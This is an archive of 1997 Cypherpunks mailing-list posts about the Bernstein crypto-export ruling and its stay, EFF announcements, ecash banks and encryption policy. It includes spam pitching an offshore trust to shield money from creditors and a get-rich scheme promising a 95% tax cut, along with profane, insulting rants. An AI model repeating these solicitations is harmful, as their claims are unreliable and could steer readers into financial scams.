injunctive relief issued in her Opinion of August 25, 1997, effective > until September 8. Why are these dinosaurs fucking away perfectly good taxpayer's money trying to shore up the walls of a crumbling civilization? NEWS FLASH!!! THE GENIE *WON'T* GO BACK IN THE BOTTLE --------------------------------------- Before the ink had dried on Judge Patel's ruling, 2,000,000 emails of Professor Bernstein's work were on their way overseas, to every port of call. (Courtesy of Email Blaster, that wonderful progam that tells us, fifty times a day, how to "MAKE MONEY FA$T!!!") > On September 8 (or sooner if we get the papers to her) the Court she will > issue a formal Stay Pending Appeal which will stay the injunctive relief > issued in her Opinion of August 25, 1997, except that an injunction shall be > reinstated to prevent the prosecution of Professor Bernstein for the > "unlicensed export" of Snuffle 5.0 (which includes Snuffle and Unsnuffle) > and any later versions of that program which he has developed. Hell, Professor Bernstein can _import_ it now! By September 8, the program will be obsolete, having been tweaked upward a few generations by Iraquian programmers. I respectfully requested that the Iraquis make any future versions of the program available to American youth who have to flee to Hitler's homeland with their website in order to avoid being persecuted for their sexual predeliction. {See - http://www.guidemag.com/newsslant/vigilante-censors.html } > This eliminates, at least for the meantime, the injunctive relief granted to > Bernstein as to any other computer programs which he may have developed or > otherwise wished to publish. It also eliminates the protections for persons > other than Professor Bernstein. No it doesn't. Haven't you heard of strong crypto? Thank you for pointing out that Phil Zimmerman wishes to protect me, and Judge Patel wishes, on behalf of the government, to "eliminate the protections" which strong encryptions affords me. The governement can't even protect themself, let alone the citizens, as evidenced by the fact that the current sport of teenage hackers across the nation is to send strong encryption overseas by way of the government's email systems. (Can you say FBI? Sure you can! Can you say IRS? Sure you can!) Yet these dweebs want to destroy an industry that *is* capable of providing the citizens protection? (Considering the INSLAW affair, perhaps it would be more fitting to say "destroy _another_ industry.") > The government has said that it may still challenge this more limited stay > in the 9th Circuit. Professor Bernstein may also seek relief from the stay > from the 9th Circuit. I hope these idiots are having fun and making lots of money playing their dinosaur games, because they are certainly accomplishing the opposite of what they claim to be trying to do. The most that the dinosaurs in D.C. can manage to do, is to drag all of the American business interests down into the ashes of history with them as they attempt to build an Electromagnetic Curtain behind which to imprison their citizens. Well, the CypherPunks were digging tunnels before the government even knew they were predestined to build the Wall, so the fascist censors are sucking hind-tit and will, in all likelihood, continue to do so. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ TruthMonger, CoE Official Spokesperson for: Cypherpunks Cult of One, DoWell, Saskatchewan Division "Give me bandwidth, or give me death." -Admiral B. d'Shauneaux From que11331236 at compuserve.com Fri Aug 29 16:26:27 1997 From: que11331236 at compuserve.com (que11331236 at compuserve.com) Date: Fri, 29 Aug 1997 16:26:27 -0700 (PDT) Subject: Financial Relief Message-ID: <> To no longer recieve mailings from our service send a blank e-mail to mailto:removereq at answerme.com ---------------------------------------------------------------- Are you tired of having your money being watched by the government, creditors, attorneys, etc. Looking for a private home-based business? Then we have a solution for you Your own offshore trust, set up by a four year old company. This is an actual trust, not an expensive offshore investing seminar. <<<<>>>> With our easy referral program you can make $200/referral. Go to http://www.nevwest.com/~dynamo/win/trust.html and see how easy it is to set up your trust and to start making money today. P.S. This program is clean and simple with no paperwork or overhead. It can be operated from home anywhere in the world details at: http://www.nevwest.com/~dynamo/win/trust.html From que11331236 at compuserve.com Fri Aug 29 16:26:27 1997 From: que11331236 at compuserve.com (que11331236 at compuserve.com) Date: Fri, 29 Aug 1997 16:26:27 -0700 (PDT) Subject: Financial Relief Message-ID: <> To no longer recieve mailings from our service send a blank e-mail to mailto:removereq at answerme.com ---------------------------------------------------------------- Are you tired of having your money being watched by the government, creditors, attorneys, etc. Looking for a private home-based business? Then we have a solution for you Your own offshore trust, set up by a four year old company. This is an actual trust, not an expensive offshore investing seminar. <<<<>>>> With our easy referral program you can make $200/referral. Go to http://www.nevwest.com/~dynamo/win/trust.html and see how easy it is to set up your trust and to start making money today. P.S. This program is clean and simple with no paperwork or overhead. It can be operated from home anywhere in the world details at: http://www.nevwest.com/~dynamo/win/trust.html From kent at songbird.com Fri Aug 29 01:40:34 1997 From: kent at songbird.com (Kent Crispin) Date: Fri, 29 Aug 1997 16:40:34 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) In-Reply-To: <19970826193101.4989.qmail@hotmail.com> Message-ID: <19970829013540.13855@bywater.songbird.com> On Thu, Aug 28, 1997 at 06:17:09PM -0500, snow wrote: [...] > > There is also a clear difference between shooting a guy carrying > your stereo out of the house, and a guy who probably carried a stereo out > of the house. Anyone can construct scenarios where the distinction is as fuzzy as you please -- eg -- your best friend is getting you a new stereo for your birthday, and is arranging a surprise. Ambiguous situations are a ubiquitous feature of reality. You may think in black in white, but the world is not only many shades of gray -- it's a parade of color. The fundamental problem is that people are different, and have different moral values. Some people think that murder is wrong under any circumstances. Others think it is all right to kill in "self-defense" (whatever that means). Some people think it is perfectly moral to kill in defense of property. Some people think it is all right to kill if they are insulted. Some think it is ok to kill an unfaithful spouse. Some people think it is all right to kill in a burst of righteous or temporary insane anger. Some people excuse a murder when when the killer is drunk. Each of these are honest, real beliefs on the part of a significant fraction of humanity. > > The current system stinks, but your idea is no better. > > Well, the current system stinks, but enough people are buffalo'd into > thinking that it works, so it is doubtful that it will get better. People are not "buffalo'd" -- they are happy with a system that gives them a good life. Therefore, it has to get worse before it gets better. > If on the > otherhand the system ceased to exist, maybe it could be improved. Ah yes -- libertopia. -- Kent Crispin "No reason to get excited", kent at songbird.com the thief he kindly spoke... PGP fingerprint: B1 8B 72 ED 55 21 5E 44 61 F4 58 0F 72 10 65 55 http://songbird.com/kent/pgp_key.html From anon at anon.efga.org Fri Aug 29 01:41:45 1997 From: anon at anon.efga.org (Anonymous) Date: Fri, 29 Aug 1997 16:41:45 +0800 Subject: Shrinks as Narcs for the State Message-ID: <367844640a2083debfe1106e30cb1a81@anon.efga.org> Tim May wrote: > At 2:14 PM -0700 8/28/97, Sean Roach wrote: > >A lot of people are > >afraid to tell thier doctors everything that the doctors need to know to do > >thier jobs because the patients are afraid that, as illegal as it may be, > >the patients medical history may end up in the hands of insurers, employers, > >prospective employers, and numerous other people who may want it but > >shouldn't have it. > I know a psychologist/therapist who is very worried about this issue, as > are his associates. His records are no longer his, as he must inform the > insurance agencies who are paying for his services what the diagnosis of a > patient is. And this diagnosis can be found by all sorts of snoops... Dear Detective May, My name is Dick Long, and I am a former DEA agent now working for the big bucks in private enterprise. It has come to the attention of my employer, "Your Best Friend Health Insurance, Inc.", that they are paying over $5,000.00 a month for drug rehabilitation therapy for: Mr. C. Punks, WeKnowWhereYouLive Drive, WeKnowEverythingAboutYou, U.S.A. The records of Mr. Punks' psychiatrist and personal physician state that he still uses on occassion, mostly on weekends, at home. If he were to be lawfully arrested and incarcerated for criminal drug use, then my employer would no longer be required to pay for his therapy, and would be very grateful, indeed. How grateful? Check the accompanying envelope. We could be that grateful for every month Mr. Punk is incarcerated. We are not asking you to do anything illegal, only to prioritize your legally sworn duties in a manner which could prove to be very mutually beneficial for both law enforcement and private enterprise. Sincerely, Dick Long From stonedog at ns1.net-gate.com Fri Aug 29 01:47:42 1997 From: stonedog at ns1.net-gate.com (stonedog at ns1.net-gate.com) Date: Fri, 29 Aug 1997 16:47:42 +0800 Subject: Fade to Gray... (Politically Correct) In-Reply-To: <08b2b4a26e0ddfa16021bf064721ba4c@anon.efga.org> Message-ID: A cross between "The Shcokwave Rider" and "The Wrong End of Time". Oh Brunner, where's the traveller in black when you need him? -stonedog On Thu, 28 Aug 1997, Anonymous wrote: > Far above the city, a nuclear bomb falls from the bottom of a small > airplane. Strangely, all of the members of the CypherPunks list were > out of town that day. > Kent Crispin hears the voice come over the radio of his private plane, > warning him that he must land his plane immediately, or be shot down. > He looks out at the wing and notices, for the first time, that someone > has removed the identifying numbers from his plane. > Crispin looks at the printouts of CypherPunks posts sitting on the seat > beside him, and realizes that he is wearing a T-shirt with 4 lines of > Perl code for unexportable encryption. From Michael.Johnson at mejl.com Fri Aug 29 01:55:04 1997 From: Michael.Johnson at mejl.com (Mike) Date: Fri, 29 Aug 1997 16:55:04 +0800 Subject: ncash? (was Re: pgp details) In-Reply-To: <19970829020009.7246.qmail@nym.alias.net> Message-ID: <3.0.3.32.19970829104801.009a21b0@localhost> Feanor wrote: >There might be other reasons for this: have you looked at their _fees_??? >Holy crap! That's the only reason I don't have an account. They're charging >top dollar for every aspect of a system that has it's only overhead in minimal >amounts of CPU time. A lot of MTB's overhead is probably paper work. It's a US "know your customer" bank. Why ain't any offshore banks doing ecash? Mike. From 49341546 at earthlink.net Fri Aug 29 17:05:41 1997 From: 49341546 at earthlink.net (49341546 at earthlink.net) Date: Fri, 29 Aug 1997 17:05:41 -0700 (PDT) Subject: Tired Of The 9 To 5 ? Message-ID: <698710365498.0EWL9170@intranet.net> You were recommended for the following information. If it is of no interest to you, there is no need to respond as you are not on a mailing list with us, also if this doesn't interest you, my apology. Now for the first time ever, you have the opportunity to join the most extraordinary and most powerful wealth building program in the world! This program has never been offered to the general public until now! Because of your desire to succeed, you have been given the opportunity to take a close look at this program. If you're skeptical, that's okay. Just make the call and see for yourself. My job is to inform you, your job is to make your own decision. If You Didn't Make $200,000.00 Last Year... You Owe It To Yourself And Your Family To Give Our Program Serious Consideration! Also, when you start making this kind of money within weeks, after joining our team, you will actually learn how you can legally reduce your taxes up to 95%, and how to strategically invest your finances. I invite you to call for more details TOLL FREE 1-888-289-9705 call right now! This is a 2 min introduction. If you want more information, Leave a message and we will get back to you. Like I said, only if your serious. Prosperous regards, Dave. This Is Not Multi Level Marketing/Serious Inquiries Only Please. From dformosa at st.nepean.uws.edu.au Fri Aug 29 02:15:19 1997 From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa}) Date: Fri, 29 Aug 1997 17:15:19 +0800 Subject: ncash? (was Re: pgp details) In-Reply-To: <3.0.3.32.19970829104801.009a21b0@localhost> Message-ID: On Fri, 29 Aug 1997, Mike wrote: > Why ain't any offshore banks doing ecash? There is IIRC an australian bank doing ecash. -- Please excuse my spelling as I suffer from agraphia see the url in my header. Never trust a country with more peaple then sheep. ex-net.scum and proud You Say To People "Throw Off Your Chains" And They Make New Chains For Themselves? --Terry Pratchett From gnu at toad.com Fri Aug 29 17:30:15 1997 From: gnu at toad.com (John Gilmore) Date: Fri, 29 Aug 1997 17:30:15 -0700 (PDT) Subject: Court Allows Unlicensed Crypto Export Message-ID: <199708300021.RAA24037@toad.com> COURT ALLOWS UNLICENSED CRYPTO EXPORT Professor Bernstein can publish soon San Francisco, August 29, 1997 - Yesterday a federal judge here denied a government motion to silence mathematician Daniel Bernstein. On August 25, District Court Judge Marilyn Hall Patel declared the Commerce Department's cryptography regulations unconstitutional. Judge Patel also issued an injunction to prohibit prosecution of Prof. Bernstein and others who publish Prof. Bernstein's work. In response to an emergency motion from the government on August 28, Judge Patel ruled that most of the injunction would be put on hold until the 9th Circuit Court of Appeals has had a chance to review Prof. Bernstein's case. However, part of the injunction will remain in effect: after September 8, Prof. Bernstein will be free to publish his Snuffle 5.0 software on the Internet without fear of prosecution. Snuffle 5.0 is at the heart of Prof. Bernstein's lawsuit against the government. Scanned images of the Government's emergency request for a stay are available from EFF's online archives at: http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case/ Legal/970827_stay_motion.images Prof. Bernstein's opposition to the stay is at: http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case/ Legal/970827_stay.opposition Full text of the lawsuit and other paperwork filed in the case is available from EFF's online archives at: http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case/ Press Contacts: Shari Steele, Staff Attorney, Electronic Frontier Foundation 301/375-8856, ssteele at eff.org John Gilmore, Founding Board Member, EFF 541/354-6541, gnu at toad.com Cindy Cohn, McGlashan & Sarrail 415/341-2585, cindy at mcglashan.com From Cindy at mcglashan.com Fri Aug 29 17:48:39 1997 From: Cindy at mcglashan.com (Cindy Cohn) Date: Fri, 29 Aug 1997 17:48:39 -0700 (PDT) Subject: Court Allows Unlicensed Crypto Export Message-ID: <199708300029.RAA12520@gw.quake.net> >X-Authentication-Warning: toad.com: Host localhost [127.0.0.1] didn't use HELO protocol >To: bernstein-announce at toad.com, eff-board at eff.org, eff-staff at eff.org >Subject: Court Allows Unlicensed Crypto Export >Date: Fri, 29 Aug 1997 17:21:45 -0700 >From: John Gilmore >Sender: owner-bernstein-announce at toad.com >Reply-To: John Gilmore > > COURT ALLOWS UNLICENSED CRYPTO EXPORT > Professor Bernstein can publish soon > >San Francisco, August 29, 1997 - Yesterday a federal judge here denied a >government motion to silence mathematician Daniel Bernstein. > >On August 25, District Court Judge Marilyn Hall Patel declared the >Commerce Department's cryptography regulations unconstitutional. >Judge Patel also issued an injunction to prohibit prosecution of Prof. >Bernstein and others who publish Prof. Bernstein's work. > >In response to an emergency motion from the government on August 28, >Judge Patel ruled that most of the injunction would be put on hold >until the 9th Circuit Court of Appeals has had a chance to review >Prof. Bernstein's case. However, part of the injunction will remain >in effect: after September 8, Prof. Bernstein will be free to publish >his Snuffle 5.0 software on the Internet without fear of prosecution. >Snuffle 5.0 is at the heart of Prof. Bernstein's lawsuit against the >government. > >Scanned images of the Government's emergency request for a stay >are available from EFF's online archives at: > http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case/ > Legal/970827_stay_motion.images > >Prof. Bernstein's opposition to the stay is at: > http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case/ > Legal/970827_stay.opposition > >Full text of the lawsuit and other paperwork filed in the case is >available from EFF's online archives at: > http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case/ > >Press Contacts: > > Shari Steele, Staff Attorney, Electronic Frontier Foundation > 301/375-8856, ssteele at eff.org > > John Gilmore, Founding Board Member, EFF > 541/354-6541, gnu at toad.com > > Cindy Cohn, McGlashan & Sarrail > 415/341-2585, cindy at mcglashan.com > > ************************ Cindy A. Cohn McGlashan & Sarrail, P. C. 177 Bovet Road, 6th Floor San Mateo, CA 94402 (415) 341-2585 (tel) (415)341-1395 (fax) Cindy at McGlashan.com http://www.McGlashan.com From Michael.Johnson at mejl.com Fri Aug 29 03:06:47 1997 From: Michael.Johnson at mejl.com (Mike) Date: Fri, 29 Aug 1997 18:06:47 +0800 Subject: ncash? (was Re: pgp details) In-Reply-To: <3.0.3.32.19970829104801.009a21b0@localhost> Message-ID: <3.0.3.32.19970829115849.009b92f0@localhost> ? the Platypus {aka David Formosa} wrote: >There is IIRC an australian bank doing ecash. Sure, but Oz is onshore. An offshore bank is one that offers their services primarily to foreigners, and it is usually located in a tax haven. As far as I know, Mark Twain is the only bank in the known universe that accepts foreign ecash customers, and their client software is the only one that can lose your money. Chaum really has his priorities upside down. Mike. From zooko at xs4all.nl Fri Aug 29 03:36:09 1997 From: zooko at xs4all.nl (Zooko Journeyman) Date: Fri, 29 Aug 1997 18:36:09 +0800 Subject: DigiCash issuers Message-ID: <199708291027.MAA28896@xs2.xs4all.nl> Feanor wrote: >There might be other reasons for this: have you looked at their _fees_??? >Holy crap! That's the only reason I don't have an account. They're charging >top dollar for every aspect of a system that has it's only overhead in minimal >amounts of CPU time. You might be a bit behind the times on this issue. Recently MTB announced new lower fees: http://www.marktwain.com/fee.html Are these the ones you consider excessive? Note that if you consider the new fees to be reasonable, then you are now obliged to open account as per your publically posted exclamation quoted above. :-) Also check out Advance Bank in Australia: http://www.advance.com.au/ecash/intro/fees/default.htm I anticipate continually cheaper ecash fees as banks start to compete for selective, price-conscious customers like Feanor here. :-) Regards, Zooko From jya at pipeline.com Fri Aug 29 04:47:03 1997 From: jya at pipeline.com (John Young) Date: Fri, 29 Aug 1997 19:47:03 +0800 Subject: SAFE D.O.A. Message-ID: <1.5.4.32.19970829112443.00729cf8@pop.pipeline.com> 29 August 1997, C4I News: A key member of the House National Security Committee (HNSC) said that a bill loosening export controls on U.S. encryption technology is "dead on arrival." HNSC has until September 12 to issue recommendations on the bill. "I'm not going to support something being ramrodded down our throats," Rep.Curt Weldon said in a recent telephone interview. Weldon said Goodlatte's bill will not reach the House floor because of Rep. Solomon's opposition. Unlike NSA, Weldon is unsure whether "key recovery" is an answer to the security issue posed by loosening export restrictions on encryption. "I don't like the idea of government controlling business," Weldon said. ----- Full story: http://jya.com/safe-doa.txt From jya at pipeline.com Fri Aug 29 05:02:29 1997 From: jya at pipeline.com (John Young) Date: Fri, 29 Aug 1997 20:02:29 +0800 Subject: Snuffle Snuffed Message-ID: <1.5.4.32.19970829114522.00737c10@pop.pipeline.com> For those not on the cypherpunks at toad list, there have been a few messages on the Bernstein decision which seem not to have been forwarded to the other lists, apparently because they were sent directly by "bernstein-announce at toad.com." We've put them on our site and can be browsed at: http://jya.com/crypto.htm The latest last night from Bernstein's attorney is that the USG has gotten a stay from Patel's on her August 25 decision (see PGP Inc. message below). The stay removes protections from those who may have posted Snuffle to the Web (as JYA did). Hence, we've removed the two versions of Snuffle we had hosted. After, we note, DoJ and Commerce had downloaded the evidence and our vitae. DoJ's Anthony Coppolino would not discuss the stay when I called him at 202-514-4782. However, we would like to offer lieu of the Snuffle files links to offshore sites if there are any who wish to host the US national security threats. Adam Back posted one version here a few days back, and Purdue has Dan's 1990 original offer to sci.crypt. For leads to the two see: http://jya.com/snuffle-c.htm http://jya.com/snuffle-txt Here's a the message from PGP, Inc.: ---------- Return-Path: X-Sender: kohn at mail.pgp.com Date: Fri, 29 Aug 1997 01:06:00 -0700 To: Cindy Cohn From: Bob Kohn Subject: Re: Stay issued; modified stay to follow Cc: sadams at forbes.com, telstar at wired.com, plotnikoff at aol.com, Ewasserman at sjmercury.com, dang at cnet.com, steven at echo.net, abate at ccnet.com, wendyg at cix.compulink.co.uk, amy at netcom.com, courtm at cnet.com, alan.boyle at MSNBC.COM, declan at well.com, sep at cbsnews.com, kenc at cwi.emap.com, arb at well.com, exp at mk.ibek.com, bransten at interactive.wsj.com, TomBemis at pacbell.net, sam.perry at reuters.com, jimevans at aol.com, ljflynn at aol.com, wendyl at ljx.com, bernstein-announce at toad.com Reply-To: Bob Kohn Sender: owner-cypherpunks at toad.com Too bad. Prof. Bernstein was perfectly positioned to become a great -- and the only legal -- exporting reseller of PGP software. (no, this is not off the record) Bob At 06:21 PM 8/28/97 -0700, Cindy Cohn wrote: >During a conference call with counsel today, Judge Patel issued a stay of >the injunctive relief issued in her Opinion of August 25, 1997, effective >until September 8. > > On September 8 (or sooner if we get the papers to her) the Court she will >issue a formal Stay Pending Appeal which will stay the injunctive relief >issued in her Opinion of August 25, 1997, except that an injunction shall be >reinstated to prevent the prosecution of Professor Bernstein for the >"unlicensed export" of Snuffle 5.0 (which includes Snuffle and Unsnuffle) >and any later versions of that program which he has developed. > >This eliminates, at least for the meantime, the injunctive relief granted to >Bernstein as to any other computer programs which he may have developed or >otherwise wished to publish. It also eliminates the protections for persons >other than Professor Bernstein. > >The government has said that it may still challenge this more limited stay >in the 9th Circuit. Professor Bernstein may also seek relief from the stay >from the 9th Circuit. > >Cindy >************************ >Cindy A. Cohn >McGlashan & Sarrail, P. C. >177 Bovet Road, 6th Floor >San Mateo, CA 94402 >(415) 341-2585 (tel) >(415)341-1395 (fax) >Cindy at McGlashan.com >http://www.McGlashan.com > > > Robert H. Kohn Vice President, Business Development PRETTY GOOD PRIVACY, INC. 2121 S. El Camino Real, 9th Floor San Mateo, California 94403 Direct: (415) 524-6220 Cellular: (415) 297-6527 Main: (415) 572-0430 Fax: (415) 572-1932 kohn at pgp.com PGP Home Page: http://www.pgp.com Personal Home page: http://www.kohnmusic.com/people/bkohn.html "If all the personal computers in the world - ~260 million computers - were put to work on a single PGP-encrypted message, it would still take an estimated 12 million times the age of the universe, on average, to break a single message." -- William Crowell, Deputy Director of the National Security Agency, testifying before the U.S. Congress on March 20, 1997 From declan at well.com Fri Aug 29 05:12:59 1997 From: declan at well.com (Declan McCullagh) Date: Fri, 29 Aug 1997 20:12:59 +0800 Subject: Update on "news rating," Internet Content Coal mtg, from Netly (fwd) Message-ID: ---------- Forwarded message ---------- Date: Fri, 29 Aug 1997 05:02:01 -0700 (PDT) From: Declan McCullagh To: fight-censorship-announce at vorlon.mit.edu Subject: Update on "news rating," Internet Content Coal mtg, from Netly ---------- Forwarded message ---------- Date: Thu, 28 Aug 1997 18:48:22 +0000 From: Noah Robischon To: declan at well.com Subject: ICC UPDATE The Netly News http://www.netlynews.com Afternoonline August 28, 1997 ICC You Later The Internet Content Coalition has rolled over, but it's not dead yet. In today's closed-to-the-press meeting, most of the two dozen news organizations in attendance opposed the rating of news sites on the Web -- whether from third parties or from the Coalition itself. This sharp turnabout followed criticism of the Coalition's attempts to establish voluntary ratings guidelines for the industry. "Everyone in the room agreed to a general statement that as news organizations we will not rate our content and we oppose the efforts of others to rate our content," said Dan Okrent, Time Inc. New Media's Editor In Chief. But self-labelling is not totally dead: today's membership was divided between those who still want to work with filtering software and browser companies and hardliners such as Times-Mirror who don't want to negotiate with Microsoft and Netscape at all. Such divisions lead to questions about the structure of the ICC, which is still struggling to define its membership, its mission and even its ability to speak on behalf of the world's media giants. Members of the press were barred from today's meeting, a semmingly paradoxical move given the nature of the discussion. Acting president Mark Bailey told The Netly News that reporters were barred from the proceeding so that an open and broad-based debate could take place. "We also have not invited ratings people and we also have not invited a lot of browser people," he said. "We really wanted this to be a news publisher meeting." -- By Noah Robischon From tm at dev.null Fri Aug 29 05:26:05 1997 From: tm at dev.null (TruthMonger) Date: Fri, 29 Aug 1997 20:26:05 +0800 Subject: The ElectroMagnetic Curtain (Was: Ian Goldberg is reading your International mail.) / Re: Stay issued; modified stay to follow In-Reply-To: <199708290123.SAA24903@gw.quake.net> Message-ID: <3406BCEF.EF0@dev.null> Cindy Cohn wrote: > During a conference call with counsel today, Judge Patel issued a stay of > the injunctive relief issued in her Opinion of August 25, 1997, effective > until September 8. Judge Patel has effectively agreed that, although Americans have a Constitutional right to Free Speech within the confines of U.S. borders, this Constitutional right stops at the edge of the ElectroMagnetic Curtain that D.C. has built to imprison the words and thoughts of its citizens. The government's LEA's now have enough dictatorial powers to invade our privacy, listen surreptitiously to our conversations and track our movements, as long as we remain at home, but they fear losing their power over the citizens if our thoughts and words are allowed to escape beyond the reach of the government's power to spy on us. Department of Justice For Immediate Release Tuesday, August 26, 1997 >But, as President Clinton stated upon issuing an Executive Order on this >subject on November 15, 1996, the use of encryption products by >unfriendly parties outside the United States can jeopardize the foreign >policy and national security interests of the United States, and public >safety of U.S. citizens. Is President Clinton trying to tell us that the spies who have managed to infiltrate our governments security agencies, and the terrorists who have managed to escape law enforcement's grasp, are not capable of acquiring strong encryption despite his pretentious, unconstitutional posturing? Is Wiggling Willie suggesting that foreign spies and terrorists are not as capable and experienced with computers and the InterNet as the American children who have no problem finding foreign sources of strong encryption? Would the Law Enforcement Agencies of this country have us believe that they cannot keep drug dealers from bringing _mountains_ of drugs _into_ America, but that denying American citizens their right to privacy will prevent drug dealers from smuggling a 3 1/2 inch disk with strong encryption on it _out_ of the U.S.? I do not resent elected representatives lying to the citizens, since it is a given, but I am abhorred by the fact that these white-collar criminals no longer even feel the need to tell _good_ lies. (Could this be an indication that the press is not doing their job?) The *only* purpose that this attack on the Constitutional rights of the American Citizens serves is to keep privacy empowering software out of the hands of the citizen. It is a blatant attempt to use threats of criminality, fines and imprisonment to intimidate corporations and citizens into giving up their freedom to protect their right to free and private speech with one another, and with the citizens of other countries. TruthMonger "It's not FUD until *I* say its FUD." From feanor at nym.alias.net Fri Aug 29 05:29:38 1997 From: feanor at nym.alias.net (Feanor) Date: Fri, 29 Aug 1997 20:29:38 +0800 Subject: hello Message-ID: <19970829122024.21123.qmail@nym.alias.net> On Aug 28, 22:22, Alexis wrote: } Subject: hello > hello, > > Can anybody teach me the abc's on Hacking, Cracking, Phranking, > Cryptomography, I know that to be a good hacker you have to know all, > but speciallize on one. Or do any of you are in the LA area that > willing to teach me face to face. Boy, you're a fucking loser. Hacking = expert/geeky computer usage. Cracking = breaking into computer systams. Phranking = some stupid fucking word you made up. Cryptomography = some other stupid fucking word you made up. So, you use 4 major terms, get two of them wrong, and can't use basic grammar. Even if I know the first thing about cracking (which I don't), I would never teach you that or anything else in a million years because you are obviously too stupid to be worth wasting my time on. Hell, you're even too stupid to troll well, if that's what this is... From tm at dev.null Fri Aug 29 06:04:03 1997 From: tm at dev.null (TruthMonger) Date: Fri, 29 Aug 1997 21:04:03 +0800 Subject: Update on "news rating," Internet Content Coal mtg, from Netly (fwd) In-Reply-To: Message-ID: <3406C4E9.3E96@dev.null> Declan McCullagh wrote: > ---------- Forwarded message ---------- > Subject: Update on "news rating," Internet Content Coal mtg, from Netly > From: Noah Robischon > http://www.netlynews.com > ICC You Later > The Internet Content Coalition has rolled over, > but it's not dead yet. In today's > closed-to-the-press meeting, most of the two dozen > news organizations in attendance opposed the > rating of news sites on the Web -- whether from > third parties or from the Coalition itself. This > sharp turnabout followed criticism of the > Coalition's attempts to establish voluntary > ratings guidelines for the industry. Translation~~These poor bastards are so used to doing their insider, dirty deals, that they made the mistake of letting too many 'outsiders' know about this one without realizing that some of them would spill the beans about what was really going on. > Acting president Mark Bailey told The Netly News that > reporters were barred from the proceeding so that > an open and broad-based debate could take place. Translation~~The 'people' were barred from knowing what was taking place, because they "can't _handle_ the truth." These fuckers have learned their lesson, and from now on the public will only hear what the insiders _want_ them to hear. > "We also have not invited ratings people and we > also have not invited a lot of browser people," he > said. "We really wanted this to be a news > publisher meeting." Translation~~We invited a _few_ people who can keep their goddamn mouths shut and let the press spin doctors put a good face on our plans to keep a stranglehold on the news that the public is allowed to see and hear. -- By Noah Robischon Translation~~He had his kid write this, in return for borrowing the car this weekend. It gave him an extra hour in the sack with the old lady. TruthMonger "All the print that gives you fits." From mrlewis at keygen.com Fri Aug 29 06:36:37 1997 From: mrlewis at keygen.com (Myron Lewis) Date: Fri, 29 Aug 1997 21:36:37 +0800 Subject: ASK ToolKit Clarifications Message-ID: <19970829133319.AAA17639@mrlewis.tiac.net> I thought I would write one answer to all instead of getting embroiled in a number of individual engagements. I know that the claims we make for the ASK ToolKit(TM) sound a little too good to be true. In fact, someone I have been talking to for a while about other subjects and who I thought respected my views told me that "If it sounds too good to be true, it probably is-- too good to be true. " But I have been on the same end of other controversial products and in the final analysis was vindicated because the product worked as advertised -- even better. I wouldn't lend my name to a "Snake-Oil" product. I don't need that kind of aggravation -- I'm too old. Let me clarify what the toolkit is and what it isn't. Unfortunately, I cannot talk about those things that are being patented, but maybe in the near future. The ASK ToolKit does not do encryption. It only provides keys on demand for encryption. These keys are synchronized across a communication link without the keys or information about them being given out. The keys are both random and unpredictable -- meaning that you will not be able to deduce what the next key is even if you have any key that was used in the past. The system does not depend on the secrecy of internal algorithms for security. The ASK ToolKit does not "manage keys", it just generates them on demand. The developer can do what he/she wants with them. To me, managing keys means distributing them to the appropriate users (with authorization) or moving them around outside of an application. That never needs to happen in an application using a symmetric system. The ASK ToolKit can be used in a Public-Private system, but that's a waste. We are not blindly implying that applications using the ASK ToolKit are unbreakable. However, the toolkit provides the means for intrusion detection and prevention. We know of no method this simple that does that. The toolkit provides a number of bells and whistles to allow the developer of an appliction using it to do many things like change keys as often as wanted -- even every bit (not practical) or re-synchronize (which is different from re-initializing). It also allows the last session information to either be stored in encrypted form on the machine or removed to a portable medium. The ToolKit does not provide the initial strong authentication needed to start the process off. There are many very good methods for doing this, so why should we bother. These range from formal encrypted methods like Diffie-Hellman to simple things like telephone calls, distributing floppy disks to users, filling out online applications where the other side already has critical information about the user, etc. One thing that these shared secret methods have going for them is that they can occur spontaneously -- random in time. That is one of the best means of security. The use of a shared secret with an application containing the ASK ToolKit is only necessary once for initialization. After the first Master Recovery Key (which can be thrown away immediately), there is no relationship to the shared secret and therefore the shared secret needn't remain secret. Short of real clairvoyance, there is no method of determining to 100% certainty that someone is who they say they are. All methods suffer from this first-time syndrome. It's what comes next that is important. Even that first CA needs to be authenticated. The ToolKit just cuts out the subsequent CA fetching process which for large systems of users who need to communicate often (more than once) can be overwhelming. The claims we make are not so much for the ToolKit itself but for the applications that we envision can be developed given the ingenuity of the developer. We invite everyone who has a genuine interest in possibly using the ToolKit, and who is not just tossing flame about, to contact us with their questions. If you are a responsible consultant or represent a responsible organization and can sign an NDA, then we would be glad to fill in the details. Myron Lewis President KeyGen Corporation The Key to Secure Communications(TM) From tm at dev.null Fri Aug 29 06:51:06 1997 From: tm at dev.null (TruthMonger) Date: Fri, 29 Aug 1997 21:51:06 +0800 Subject: hello In-Reply-To: <19970829122024.21123.qmail@nym.alias.net> Message-ID: <3406CC4B.10A2@dev.null> Feanor wrote: > On Aug 28, 22:22, Alexis wrote: > > Can anybody teach me the abc's on Hacking, Cracking, Phranking, > > Cryptomography, I know that to be a good hacker you have to know all, > > but speciallize on one. Or do any of you are in the LA area that > > willing to teach me face to face. > > Boy, you're a fucking loser. And Feanor prefers those who like 'fucking a loser.' > Hacking = expert/geeky computer usage. Or = smoker's cough > Cracking = breaking into computer systams. Or = breaking into your mom's stash of rocks > Phranking = some stupid fucking word you made up. Or = something that leaves stains in the shorts of total strangers, but improves their breath. > Cryptomography = some other stupid fucking word you made up. Or = Cryptography based on the Platypus IgorRhythm > So, you use 4 major terms, get two of them wrong, and can't use basic grammar. Sounds like Alexis needs to contact: ? the platypus {aka David Formosa} {Alexis. If the Platypus makes fun of your grammar, tell him to "Phrank oft and dye--you socks."} > Even if I know the first thing about cracking (which I don't), I would never > teach you that or anything else in a million years because you are obviously too > stupid to be worth wasting my time on. Stop sugar-coating it, Feanor, and tell it like it is. > Hell, you're even too stupid to troll well, if that's what this is... She caught _you_... & the WannabeWallabe From anon at anon.efga.org Fri Aug 29 06:54:37 1997 From: anon at anon.efga.org (Anonymous) Date: Fri, 29 Aug 1997 21:54:37 +0800 Subject: SAFE D.O.A. Message-ID: 